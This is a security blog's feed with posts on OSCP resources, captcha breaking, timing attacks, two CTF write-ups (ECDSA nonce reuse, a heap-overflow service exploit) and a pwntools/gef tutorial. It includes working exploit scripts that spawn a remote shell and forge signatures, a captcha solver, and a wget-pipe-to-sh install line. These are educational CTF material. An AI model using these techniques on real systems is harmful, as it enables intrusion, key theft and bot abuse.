<![CDATA[parzelsec]]>parzel.github.io//parzel.github.io//favicon.pngparzelsecparzel.github.io//Ghost 3.14Mon, 04 May 2020 20:59:53 GMT60<![CDATA[OSCP Tools & Resources]]>parzel.github.io//oscp-tools-and-resources/5eafdfa625341f6f181dbabdSat, 26 Oct 2019 16:40:36 GMTSince I recently passed my OSCP and have read a lot of OSCP blogs in the process, I thought I will share some information and tips as well. Due to the shear amount of existing blog posts that all cover the exam perfectly, I do not want to add another one, telling you how to manage your time or structure the exam. Instead I will supply you with some ressources I have used myself, that might be of help for you as well. At this point I wanna say thanks to all the people contributing resources to the community in their spare time :-)

This will just be a general collection of resources and links but if you have any questions, feel free to contact me on Twitter - I wish you good look for your exam!

General Ressources

PWK Example Report - Have a look at this one early on, so you know what is expected to be in your exam and lab report.

Same goes for the OSCP Certification Exam Guide. There are restrictions in the exam regarding tools you are allowed to use. You are only allowed to use MSF on one of the boxes in the exam. So try to read this and avoid the tools which are not allowed in the exam during your lab and practice time.

By now all exams are proctored. Check here what this means for you and check if you meet the requirements for the proctoring session. Also use Chrome in the proctoring as Firefox is really unstable.

Payloads

My goto for basically every kind of payload by now is Payloads All The Things. It is an incredible big and well maintained collection for methodologies, techniques and payloads. Especially helpful is the Reverse Shell Cheat Sheet. Make sure to understand and read the Spawn TTY Shell chapter as it will help you a lot with not losing your shells by an accidental CTRL + C.

Guides

These guides are not perfect but they help you to further solidify some information which you get in the PWK material.

Privilege Escalation

In my eyes this is the hard part of OSCP. So practice it a lot and watch videos that help you understand potential privesc vectors if you have nothing to practice on. Try to avoid Eternalblue and DirtyCow in the lab. It will not help you to learn anything and there are other privesc vectors that will help you train the general methodology more.

Linux:

Windows:

Compiling for Windows on Linux:

apt-get install mingw-w64
i686-w64-mingw32-gcc exploit.c -o privesc.exe -lws2_32

Workshops:

BOF

Practice and do the BOF in the exam. It will give you a save 25 points.

Tools

If you want to save a lot of time during the exam, think about using some script that handles automatic enumeration for you. It will be faster and save you from forgetting that one crucial scan.

  • AutoRecon - I liked this most. Tweak it to fit your personal needs.

I did not use Kali Linux but preferred to use my normal system, where I a most comfortable working on. To have access to Kali's Repositories I used a modified Kali image with Docker. Find my Dockerfile here.

Report

While Offensive Security supply you with a Word template, I would recommend you to use this one for Markdown. It saves you from a lot of work, regarding image resizing and fitting and makes inserting code easier.

]]>
<![CDATA[Breaking Simple Captchas with Tesseract OCR and OpenCV in Python]]>parzel.github.io//breaking-simple-captchas-in-python/5eafdfa625341f6f181dbabcSun, 05 May 2019 13:35:05 GMTIn this blog post I will outline the general approach to solve simple captchas, how to remove basic kinds of noise from an image and in the end how you can speed up and improve accuracy for the Tesseract OCR framework when used in Python. The task I tried to solve was detecting 100 of these captchas below in under 30 seconds.

Captcha

First lets try to outline the general approach to a captcha like this. Text can usually be deciphered very good with already existing OCR solutions like GOCR or Tesseract. Tesseract is currently developed by Google and has a big community, which is the reason I have chosen it for this post.

If we want to bring Tesseract to its full potential we need to ensure its input data is clean and readable. To make OCR detection as hard as possible, captcha creators try to insert as much noise as possible into an image. Possible in this case means, it is still readable and understandable by a human but should be hard to differentiate by a computer.

Now that we have a general idea what we want to achieve, so lets get started with the first step. We will use Python for our solver even though C would be faster, just because it is easier to understand and faster to write.

Removing noise from an image with Python can be done with the OpenCV library. It is a computer vision framework with a wide support of programming languages and very good documentation for Python. We will remove noise in three simple steps. First we want to load the image as an gray scale image and increase the image size, so that our filters we want to apply later, have impact on a lesser amount of pixels. Then we want to smoothen the image a little bit, which will give us better results in the last step, where we transform the different color tones of the image with a threshold into a binary representation.

Below you can see how every step impacts the input image.

Now it is an easy thing to use tesseract on the resulting image. If we invoke it from the command line we see the results are not very good yet:

We can improve this by two simple tweaks. First we are going to specify the structure of the image by supplying the "--psm" parameter. As we can read up in the manual (man tesseract), number 8 will skip detection of the image struture and assume a single word.

The second option we want to enable is the feature "tessedit_char_whitelist=...". It allows us to restrict the detection to only recognize characters we whitelisted. This currently can only be used with the legacy version of tesseract, which is why we also force tesseract to use this engine with the "--oem 0" parameter.

This looks pretty good now! Now we only need to find a Python plugin for handling tesseract. A quick search leads us to pytesseract. Pytesseract works really well and we can easily use it in our Python detection module. Lets see how it performs.

Here you can look up the source code for this basic steps:

import cv2
import os
import subprocess
import time

file_list = set(os.listdir("captchas"))

t_end = time.time() + 30
count = 0

while time.time() < t_end:
    filename = f"captchas/{file_list.pop()}"
    img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)
    img = cv2.resize(img, None, fx=10, fy=10, interpolation=cv2.INTER_LINEAR)
    img = cv2.medianBlur(img, 9)
    th, img = cv2.threshold(img, 185, 255, cv2.THRESH_BINARY)
    cv2.imwrite("image.png", img)
    command = ['tesseract', 'image.png', 'stdout', '--psm', '8', '--oem', '0', '-c', 'tessedit_char_whitelist=abcdefghijklmnopqrstuvwxyz', '--dpi', '70']
    captcha_text = subprocess.check_output(command).decode().replace(" ", "").rstrip().lower()
    os.rename(filename, f"captchas/{captcha_text}.png")
    count += 1
print(f"Done. Solved {count} captchas in 30 seconds.")

That is way too slow for the goal we set ourselves! The slow speed of tesseract for recognizing only a few characters made me wonder if everthing is working to its optimum at this point. That was when I had a look at the source code of pytesseract and noticed that is basically just a wrapper for the command line tool of tesseract. By using the "time" command we can check how fast tesseract is for a single image. When I checked how fast it is for multiple images supplied at once I noticed the following:

From this we can infer, that initializing tesseract needs a lot of time, while the actual detection is very fast. So I was looking for a faster alternative and found tesserocr. Tesserocr has one big advantage. It does not wrap the command line version of tesseract but instead uses libtesseract directly with Cython. By using this module we can avoid initializing the library over and over again. Lets modify our code and see how it performs.

And here is the source belonging to it:

import cv2
import os
import time
# https://github.com/sirfz/tesserocr/issues/165
import locale
locale.setlocale(locale.LC_ALL, 'C')
from tesserocr import PyTessBaseAPI, PSM, OEM

file_list = set(os.listdir("captchas"))

t_end = time.time() + 30
count = 0

with PyTessBaseAPI(psm=PSM.SINGLE_WORD, oem=OEM.TESSERACT_ONLY) as api:
    api.SetVariable("tessedit_char_whitelist", "abcdefghijklmnopqrstuvwxyz")
    while time.time() < t_end:
        filename = f"captchas/{file_list.pop()}"
        img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)
        img = cv2.resize(img, None, fx=10, fy=10, interpolation=cv2.INTER_LINEAR)
        img = cv2.medianBlur(img, 9)
        th, img = cv2.threshold(img, 185, 255, cv2.THRESH_BINARY)
        cv2.imwrite("image.png", img)
        api.SetImageFile("image.png")
        captcha_text = api.GetUTF8Text().replace(" ", "").rstrip().lower()
        os.rename(filename, f"captchas/{captcha_text}.png")
        count += 1

print(f"Done. Solved {count} captchas in 30 seconds.")

Perfect. So for all of you out there that need to do (faster) OCR detection in Python, maybe it is worth having a look at tesserocr instead of pytesser ;)

If you have comments or questions feel free to write me at twitter @parzel2

]]>
<![CDATA[Timing Attacks using Machine Learning]]>parzel.github.io//timing-attacks-with-machine-learning/5eafdfa625341f6f181dbabaSun, 14 Apr 2019 20:37:50 GMTMost timing attacks fail because the timing differences are too small and the noise is too big.
Naive statistical measures like mean, median or percentile neglect the inner structure of the data and perform poorly in difficult cases. In this article we will analyze and model timing attacks, enabling us to apply machine learning techniques and power up timing attacks as we knew them.

Introduction to Timing Attacks

Explaining timing attacks in three sentences: A Hacker can infer that a password starts with "S" because the server responds to 'SXXXX' a tiny bit slower than to 'AXXXX', 'BXXXX', ... . This is caused by the implementation of a string-compare function, that iterates over the strings character by character and returns upon finding the first characters that don't match. Using this principle the attacker is able to reconstruct the whole password character by character.

In this article we will exemplify timing attacks with finding out a password, but different objectives are possible like inferring a web-token or crypto secret.

Mathematically, we can compare the run times for finding out the whole password of length n:
Brute Force: $O(|A|^n)$
Timing Attack: $O(n\times|A|)$
where $|A|$ is the amount of all possible characters in a password.

Enough of the basics!
We will make measurements, visualize the data and construct a model to describe the observations.

Analyzing: The slow string compare

Before we will analyze the fastest string-compare function that python has to offer, let's look at a slower string-compare function:

TRUE_PW = "SuPerDupeRStrongPassword"
def str_compare_slow(str1, str2):
    counter = 0
    while counter < len(str1) and counter < len(str2):
        if str1[counter] == str2[counter]:
            counter = counter + 1
        else:
            return counter

Firstly, we want to measure string-compare timings and visualize them, in order to understand and model the data.

Timing measurements of ~1.000.000 'string_compare_slow' executions with 15 and 16 correct password characters. The last row shows the difference $\Delta$

We can observe the timing distribution of the 'string_compare_slow' function in the first two rows. The distributions show a big Gaussian, surrounded by smaller Gaussians which are caused by system-specific noise like scheduling delays or network-routing.
The last row shows the difference of the timing distributions, which is a simple Gaussian distribution ($\mu_\Delta=0.2$). This $\Delta$ is exactly the amount of time it takes the 'string_compare_slow' function to check the next correct character.
We make a very important observation here: When we measure timings, it is essential to measure a reference timing before and take the difference of the two measurements. By doing this we get can rid of complex system-specific noise and obtain a simple Gaussian distribution $\Delta$ (third row).

Formalizing our observations - we define the response time of the server when the first $k-1$ characters are correct as $T_k$:
$$T_{k} = T_{k-1} + \Delta_k$$
Hence,
$$\Delta_k = T_{k} - T_{k-1}$$
where
$$ \Delta_k \sim \begin{cases} \mathcal{N}(\mu , & \nu), & \text{if k'th character is correct} \\ \mathcal{N}(0 , & \nu'), & \text{if k'th character is incorrect} \end{cases} $$
So in each iteration step, for each candidate character we make a reference time measurement $T_{k-1}$ and subtract it from the time measurement of the candidate character $T_{k}$ to obtain $\Delta_k$.
If the k'th character is incorrect, the time difference $\Delta_k$ should on average be zero. On the other hand if the k'th character is correct, we expect to measure an average delay $\mu > 0$.

So when we measure timing differences $\Delta_k$ for the next character in the password, we get a mixture of two Gaussian distributions, one being generated by the incorrect characters and one being generated by the next correct password character:

Timing delta distribution: incorrect and correct characters yield two well-seperated Gaussian distributions. 

Thanks to a machine learning technique called Gaussian Mixture Modelling we can automatically compute the mean and the variance of these two Gaussians, and compute for each character the probability that it was generated by $\Delta_{correct}$ or $\Delta_{incorrect}$. By doing this, we can not only determine the next correct character but also detect if we have chosen a bad character in an iteration step before, but we will come to that later.

You might think - "Why make it so complicated if I can just take the mean for each character and pick the character with the biggest mean as the next character of the password?"
Well, if we look at faster string-compare functions, taking the mean will not suffice anymore since the variance of the data is bigger than the separation of the means.
This means that most of the times we will pick a wrong character, because the data is too noisy.

Let's look at this case where the time differences are so small, such that the Gaussians 'melt' together.

The fast string compare and Gaussian Mixture Models

To visualize why median, mean or percentile fail as robust metrics to determine the next correct character, let's look the fastest string-compare function that python has to offer:

def str_compare_fast(str1, str2):
    return str1 == str2

Measuring the time differences caused by this fast string-compare function:

As we can see, the distributions are not well separated and naive metrics like mean, median or percentile fail most of the times, since the data is pretty noisy.

But since we know that the data is generated from two Gaussians, we can leverage Gaussian Mixture Models to compute the two most likely Gaussians that generated the data.

Measured delta times and the fitted two Gaussian from the Gaussian Mixture Model algorithm (red).

By modelling the data as a Gaussian Mixture Model, timing attacks become more resistant to noisy measurements and we are able to compute the probability of a character to be correct.
Assigning probabilities enables us to measure a confidence of the correctness of a selected character as well as detection of wrongly chosen characters.

So the algorithm to decide on the next character works as follows:
1) Build Gaussian Mixture Models (two Gaussians) from the timing differences
2) For each character, compute the probability that its measurements were generated
by Gaussian distr. 1 or Gaussian distr. 2
3) Select character of highest probability to belong to biggest-mean Gaussian as the
next character

The next plot shows the probability that a character is correct:

The "w" character has a "correct"-probability > 0.9 and will be selected as the next character in our algorithm. "w" is in fact the correct character at this position.

The plot shows that the character "w" has the highest probability (> 0.9) to be generated from the "correct"-Gaussian. This is in fact the correct next character. The other characters fall off well, having probabilities of < 0.6.

In the case where we made a wrong decision and picked a wrong character as the next character, looking at the following plot helps us detect that:

No character achieves a "correct"-probability of > 0.9. In this case our algorithm will reevaluate the previous character.

As we can see, no character is extremely likely to be generated by the "correct"-Gaussian. All characters have probabilities of < 0.8.
In our algorithm, if no character has probability of > 0.9, we will go back one step and decide on the previous character again.

The following GIF shows the execution of our algorithm including the detection of wrong choices:

If you want to see the code or implement your own timing analysis using Gaussian Mixture Models, I have compiled a small API on github here.

As we have seen, modelling the data generation and applying machine learning techniques gave us the possibility to detect wrongly chosen characters and deal with noise-intensive processes in a straight forward manner.

Define and conquer!

niknax

]]>
<![CDATA[[packetwars 2019] Writeup 'Fun with Finite Fields']]>parzel.github.io//packetwars-2019-writeup-fun-with-finite-fields/5eafdfa625341f6f181dbab9Thu, 04 Apr 2019 21:41:24 GMTHeidelberg, Germany, after a lovely day in march at the TROOPERS Conference 2019 I find myself in a traditional german restaurant. It's cold, it's loud, the food is 6/10, I'm sober and me and Parzel are waiting for Packetwars to start.

Nice! A crypto challenge! "Fun with Finite Fields" is the name.

The only prior information about the challenge is the name: "Fun with Finite Fields" - OK probably Elliptic Curve cryptography... I'm scared - I only know one (textbook) attack on EC signatures. That's all I need, as I will find out.


How the challenge works:

We find the lonely challenge server waiting for my TCP connection. I get this prompt after connecting with netcat:

Server prompt of the challenge

Note the display of the public key - we will need that for later.

'Generating secure k' - What a surprise, this is probably the textbook example I was thinking about. How the attack works will unfold shortly, but let's look first what the server has to offer.

Two commands of interest:
- Sign command: Enter a command and retrieve it's EC crypto signature.
- Execute command:  Enter a command and it's signature and retrieve it's output.

You can only retrieve the signatures for the commands ['ls', 'pwd', 'cat server.py'].

Alright, let's execute 'ls':

ls shows: the flag is right there we just need to cat it

Pretty straight forward: The challenge clearly wants us to forge a signature for a 'cat flag.txt' command.

Let's see what server.py looks like (execute 'cat server.py'):

import ecdsa
import os
import sys
import secrets

print("Welcome to the secure shell.")
print("Setting up")
print("Generating key")

sk = ecdsa.SigningKey.generate() # uses NIST192p
vk = sk.get_verifying_key()

print("Using the following verification key:")
print(vk.to_pem().decode('utf-8'))


"""https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm#Security says it is important to have a secure random k
so make sure we generate it properly"""
print("Generating secure k")
k = secrets.randbelow(sk.curve.order)

def sign():
    allowed_cmds = [ 'ls', 'pwd', 'cat server.py']
    cmd = input("Command to sign:")
    if cmd not in allowed_cmds:
        print("Illegal command, only allowed commands are %s" % allowed_cmds)
    else:
        sig = sk.sign(cmd.encode("utf-8"), k=k)
        print("Signature: %s" % sig.hex())

def execute():
    cmd = input("Command to execute: ")
    signature = input("Signature: ")
    signature = bytes.fromhex(signature)
    try:
        vk.verify(signature, cmd.encode('utf-8'))
        print("Correct signature, executing command")
        os.system(cmd)
    except ecdsa.BadSignatureError:
        print("Invalid signature")
    return

menu = {
    '1': sign,
    '2': execute,
    '3': sys.exit
}
while True:
    print("1. Sign command")
    print("2. Execute command")
    print("3. Exit")
    cmd = input("Select:")
    try:
        menu[cmd]()
    except KeyError:
        print("Invalid selection")


The textbook vulnerability is right there: k is not generated randomly for each signature but only once and reused for different signatures!

BTW: Nice hint in the code:
https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm
It states there:
As the standard notes, it is not only required for k to be secret, but it is also crucial to select different k for different signatures, otherwise the equation in step 6 can be solved for the private key.

La solución:

All we need to do is follow the instructions on Wikipedia:

Instructions on how to obtain the private key when the same k is used for 2 signatures

Let's resolve the symbols here:
- n : group order (all operations are mod n)
- k : cryptographically secure random integer from [1,n-1]
- z : SHA1(message) mod n, where message will be signed (SHA1 is default)
- (r, s) : the signature of message (yes the signature is a tuple)

How the attack works:

Using the public key from the greeting message, we can infer n, the group order.
We just need to parse the public key, which is best done within python-ecdsa.

We also need to parse the 2 signatures we obtained from the 'ls' and 'cat server.py' commands.
Additionally we compute z and z' by hashing 'ls' and 'cat server.py' with SHA1.

We can then compute k and finally the private key.
Using the private key, we finally can forge signatures to commands of our choice.

Attack and results:

Obtaining the public key and 2 signatures:

Let's feed the public key and the 2 signatures into our python script:

import ecdsa
import gmpy

pub_key_string = "MEkwEwYHKoZIzj0CAQYIKoZIzj0DAQEDMgAEs6zGswjq+TmkijBDMrGuWX37pEhzZInHVrlPQ0evnumbG0j/++KDmdhdkn5aVY1e"

m1 = "ls"
sig1 = "cd03afe9a551932e598f26bce4d9f6ebdaf90cf0235346f22e0d84bc88ca301db091fec18665adc932d2f722fd918cb6"

m2 = "cat server.py"
sig2 = "cd03afe9a551932e598f26bce4d9f6ebdaf90cf0235346f21d50eb70af1677f6c53eb32575af83bb0cd7a7566bbb19ff"

# Generate own key-pair to access utility functions
sk = ecdsa.SigningKey.generate() # uses NIST192p
vk = sk.get_verifying_key()

# Parse public key from the server and obtain n
veri_key = vk.from_pem(pub_key_string)
n = veri_key.pubkey.order

# Parse the 2 signatures
r1, s1 = ecdsa.util.sigdecode_string(bytes.fromhex(sig1), order=n)
r2, s2 = ecdsa.util.sigdecode_string(bytes.fromhex(sig2), order=n)

# Hash the commands (ls, cat server.py) and transform them into numbers
h1 = ecdsa.keys.sha1(m1.encode("utf-8"))
z1 = ecdsa.util.string_to_number(h1.digest())
h2 = ecdsa.keys.sha1(m2.encode("utf-8"))
z2 = ecdsa.util.string_to_number(h2.digest())

# Perform math according to wikipedia
k=((z1 - z2) * gmpy.invert(s1 - s2, n)) % n
print("k: ", k)
r_inv = gmpy.invert(r1,n)
d_a = ((s1*k - z1) * r_inv) % n

# Sign own command (cat flag.txt) using the obtained secret exponent
COMMAND = "cat flag.txt"
sk_new = sk.from_secret_exponent(d_a)
print("Command: ", COMMAND)
sig = sk_new.sign(COMMAND.encode("utf-8"), k=k)
print("Signature: ", sig.hex())

The forged signature to our own command ('cat flag.txt') is presented to the server:

There we are: We hold the flag in our hands

That's it: The flag is right there!

All in all I must say, the only big challenge was to fiddle with python-ecdsa to parse the public key and signatures.
It's nice to work with python-ecdsa and get familiar with the library since I have not worked much with Elliptic Curve cryptography.
I definitely learned alot about the framework and how use it.
I hope someone will find help in the textbook implementation of this attack.

Cheers

Niknax

]]>
<![CDATA[[packetwars 2019] Writeup 'CVE launcher']]>parzel.github.io//writeup-cve-launcher/5eafdfa625341f6f181dbab8Wed, 27 Mar 2019 11:09:20 GMTThis is a writeup for the service CVE launcher of the packetwars CTF from the Troopers 2019. You can get the challenges here and ask questions and give positive feedback to him.

While I did not finish the exploit in time at the event, I finished it afterwards in the train and also was able to improve my workflow for binary exploitation a bit. If you are interested how, you can check my blog post about it here.

The challenge was to exploit CVE launcher, a service running on a remote server. Luckily we got the binary and also the source code. When we execute the binary we can see it is greeting us with several options. Lets explore this a bit.

╰─$ ./cve_launcher
                                                                             
Please choose:
  [l]aunch CVE
  [t]est   CVE
  [a]dd    CVE
  [d]elete CVE
  [s]how   CVE
  [q]uit

Choice:

Let us start with showing what kind of CVEs are available.

Choice: s

-- Show CVE --
Select CVE:
[01] CVE-2020-202020 (approved)
[02] CVE-2020-010101 (approved)

Choice: 1
                            
Index:   1
Name:    CVE-2020-202020
State:   approved
Exploit: echo 'AAAAAAAAAAAAAAAAAAAAAAAAA<$payload$>' | ncat <$target$>      
Payload: echo 'Code Execution, yay!'

Trying to launch a CVE tells us that this function is currently not supported. If we try to test a CVE, we can pick between the two already approved CVEs and the payload is executed on the host system.

Choice: t

-- Test CVE Payload --
Select CVE:
[01] CVE-2020-202020 (approved)
[02] CVE-2020-010101 (approved)

Choice: 1
Launching Payload for CVE-2020-202020...
system("echo 'Code Execution, yay!'");
Code Execution, yay!

Alright so lets try to create our own CVE and execute it! For the creation of an exploit we need to set the size of the exploit and payload. Afterwards we can define these. I just pick "/bin/sh" here because we aim for a shell on the remote service.

Choice: a                                                                    
Size of Exploit (in bytes): 10
Size of Payload (in bytes): 10
Exploit size: 10 [0xa]   Payload size: 10 [0xa]  Combined: 20 [0x14]        
CVE Name: test
Exploit: /bin/sh
Payload: /bin/sh
Added test!

Please choose:
  [l]aunch CVE
  [t]est   CVE
  [a]dd    CVE
  [d]elete CVE
  [s]how   CVE
  [q]uit

Choice: t

-- Test CVE Payload --
Select CVE:
[01] CVE-2020-202020 (approved)
[02] CVE-2020-010101 (approved)
[03] test (pending)

Choice: 3
Not allowed! CVE must be in state 'approved'!

We see that the exploit needs to be approved so that we can test (and therefore execute) the payload. At this point I just started to play around with the binary, testing things like very long names, negative values, very high values and so on. During this I noticed the following.

Choice: a
Size of Exploit (in bytes): 100000000000
Size of Payload (in bytes): 100000000000
Exploit size: 1215752192 [0x4876e800]   Payload size: 1215752192 [0x4876e800]  Combined: -1863462912 [0x90edd000]

This looks like an integer overflow to me! Maybe we have the chance to abuse this. Lets look into the source code.

void addCVE() {
    struct CVE* cve;
    struct CVE* cursor;
    size_t exploit_size;
    size_t payload_size;
    char* exploit;
    char* payload;
    char buf[20];

    printf("Size of Exploit (in bytes): ");
    fgets(buf, sizeof(buf), stdin);
    exploit_size = atoi(buf);

    printf("Size of Payload (in bytes): ");
    fgets(buf, sizeof(buf), stdin);
    payload_size = atoi(buf);

    cve     = malloc(sizeof(struct CVE));
    exploit = malloc(exploit_size+payload_size);
    printf("exploit ptr is %p\n", exploit);
    if(!cve || !exploit)
        exit(-1);

    printf("CVE Name: ");
    fgets(cve->name, sizeof(cve->name), stdin);
    cve->name[strlen(cve->name)-1] = 0;
    strcpy(cve->state, "pending");
 
    printf("Exploit: ");
    read(STDIN_FILENO, exploit, exploit_size);
    printf("read done\n");
    exploit[exploit_size-1] = 0;
    printf("assignment done\n");
    cve->exploit = exploit;

    payload = exploit + strlen(exploit) + 1;

    printf("payload ptr is %p\n", payload);

    printf("Payload: ");
    read(STDIN_FILENO, payload, payload_size);
    payload[payload_size-1] = 0;
    cve->payload = payload;
    cve->next = NULL;

We see that the exploit and payload size are converted from a string to an integer with atoi. Later on their combined size is allocated on the heap. The bug above can be explained with the integer max size in c. An integer can only hold a value until 2147483647. After that it "tips" into the negative range. As seen here with exploit size 2147483648.

Choice: a
Size of Exploit (in bytes): 2147483648
Size of Payload (in bytes): 12
Exploit size: -2147483648 [0x80000000]   Payload size: 12 [0xc]  Combined: -2147483636 [0x8000000c]

How can we abuse that? We know that objects holding the CVEs are allocated on the heap. With gef/gdb we can have a nice view of the heap area.

As we can see the CVE name and its data are stored on the heap. Additionally the approval state is stored on the heap. Now we can connect the dots. Maybe with the integer overflow we can trigger an out of bound write on the heap and this allows us to change the status from on of our own created CVEs from "pending" to "approved". For this we need to understand the source code a little bit better.

The malloc call allocates enough space for payload and exploit size combined by adding these together. Later on we are reading as much input from stdin as the individual sizes allow us to do. Thats where the bug comes into play. If we manage to get the allocated size to be smaller than the payload and exploit size individually, we can overflow chunks on the heap.

Execution of this is relatively simple. We just pick an exploit size that is so big that combined with payload size the resulting combined size is overflowed into the begin of the positive range.

Choice: a
Size of Exploit (in bytes): 4294967200
Size of Payload (in bytes): 100
Exploit size: -96 [0xffffffa0]   Payload size: 100 [0x64]  Combined: 4 [0x4]

As you can see we only allocate 4 bytes with malloc now, while we are able to read 100 bytes for the payload from stdin (and none for exploit because it is negative).

There is still one more thing to handle. As you can see in the picture above, if we overflow the payload we can only overflow in the structure after our CVE. Therefore to make this work we first allocate some space (a dummy CVE) and our actual payload we want to trigger afterwards. Afte the payload we can delete or in terms of malloc free the space again. Because of the way malloc works, if we allocate space that is the same size or smaller then our freed dummy chunk, it will be put in the same slot. And this allows us to overflow and approve our actual payload.

The full exploit now looks like this:

1. Create dummy exploit to reserve some space on the heap
2. Create exploit with payload we want to trigger later on
3. Remove dummy exploit
4. Create overflowing exploit
 5. Overflow approved into our payload exploit
 6. "Test" our payload exploit

Down below you can find the complete exploit. If you have questions or comments feel free to write me at twitter @parzel2

'''
POC for exploitation of CVE launcher at troopers19
'''

from pwn import *

sh = remote("63.32.45.10", 1337)

def read_until_timeout(time=0.2):
    while True:
        text = sh.recvline(timeout=time)
        if not text:
            break
        print(text.decode(), end="")

def write_and_read(commands):
    if not isinstance(commands, list):
        commands = [commands]
    for c in commands:
        sh.sendline(c)
        read_until_timeout()


# show menu
read_until_timeout()

# create dummy exploit
write_and_read("a")
write_and_read("2")
write_and_read("2")
write_and_read("dummy")
write_and_read("B")
write_and_read("C")
write_and_read("s")
write_and_read("3")

# create actual exploit
write_and_read("a")
write_and_read("20")
write_and_read("20")
write_and_read("/bin/sh")
write_and_read("/bin/sh")
write_and_read("/bin/sh")

write_and_read("s")
write_and_read("4")

# remove dummy exploit
write_and_read("d")
write_and_read("3")

# create overflowing exploit
write_and_read("a")
write_and_read("4294967200") # Overflow to the border of shifting again into positive integer area
write_and_read("100") # This tips the iceberg and too less memory gets allocated
write_and_read("overfl0w")
# No input for exploit because it is negative
write_and_read("BBBB"+"A"*47+"approved")

# trigger exploit
write_and_read("t")
write_and_read("3")
print("\n[+] Now you got a shell")
print("$ id")
write_and_read("id")
print("$ cat flag")
write_and_read("cat flag.txt")
]]>
<![CDATA[Speed up your binary exploits! An introduction to gef and pwntools]]>parzel.github.io//speed-up-your-exploits/5eafdfa625341f6f181dbab7Sat, 23 Mar 2019 16:10:18 GMTRecently I was at an awesome security conference in Heidelberg called Troopers. During this event there was a two hour CTF event that consisted of two different stages. First stage was getting an initial foothold into a system while the second stage was to pivot to other machines in the hosted network. These other machines were running different services and I was working on a service called CVE launcher (you can get it here, I also made a writeup here). CVE launcher was a binary that was vulnerable against heap overflows due to several integer overflows. Because I was not able to finish my exploit during the game time I decided that I want to speed up my exploit development. In this blog post I will explain how I was able to speed up my workflow and hopefully give you some ideas for faster exploit development as well.

So let's get started!

While some of you may already use either pwntools or some gdb extension I will start to explain this from scratch, so nobody gets lost right away.

Pwntools is a really neat library for python which allows you to speed up binary exploitation in several ways. The full scope of its features is huge and I am merely scratching the surface here. If you want to dive deeper into pwntools have a look at the very detailed documentation.

The feature I like most about pwntools is its tubes. These allow you to easily talk with service in a network or for example a binary.

from pwn import *

sh = process("/path/to/binary")
# sh = remote('host', port)
sh.sendline("someinput")
oneline = sh.recvline(timeout=0.2)

Tubes are also easily interchangable, therefore you can develop your exploit locally and just change from process to remote to use the same exploit an a network.

You can perform several automated steps and afterwards drop into an interactive shell. With this feature you can speed up processes that are necessary to get to a certain point in the application state without having to perform these either manually or write overhead code. Instead you can focus on the exploit logic itself.

Let's say your exploit needs several actions to be performed as setup until you are able to have a deeper look with gdb into the heap or stack and check the structure of it.

This brings us to the second feature which is really cool about pwntools. It allows you to connect with gdb easily. You can either start a process directly connected to gdb with

from pwn import *

sh = gdb.debug("/path/to/binary")
sh.sendline("someinput")
oneline = sh.recvline(timeout=2)

or if you prefer you can attach it anytime later. If you specify tmux as your terminal in the context variable you are even able to spawn the gdb shell directly in the same pane - That's super handy!

from pwn import *

context.terminal = ['tmux', 'splitw', '-v']

sh = process("/path/to/binary")
sh.sendline("someinput")
oneline = sh.recvline(timeout=2)
gdb.attach(sh)

At this point gef comes into play. For those of you that already know extensions for gdb like pwdbg or peda - basically gef is the same thing. Big plus about gef though is that you can easily install it in less than 20 seconds.

$ wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

And done! Gef is an extension for gdb that allows you to perform easier debugging and also has lots of features which you should get familiar with. In this case I used the "heap" command, which allows you to easily visualize chunks on the heap.

Not lets get to the last thing in the toolchain. pwntools also allows you to execute commands in gdb. This allows you to perform tedious gdb commands in a fast way directly when the exploit is executed.

from pwn import *

context.terminal = ['tmux', 'splitw', '-v']

sh = process("/path/to/binary")
sh.sendline("someinput")
oneline = sh.recvline(timeout=2)

gdb.attach(sh, '''
break somefunction
heap chunks
''')

sh.interactive()

By this we can perform different actions in the binary, start gdb in a our tmux pane, set a breakpoint at a certain function and display the heap.

That's it for this blog post. I hope it gave you some new insights. If you have comments or improvements feel free to write me at twitter @parzel2

]]>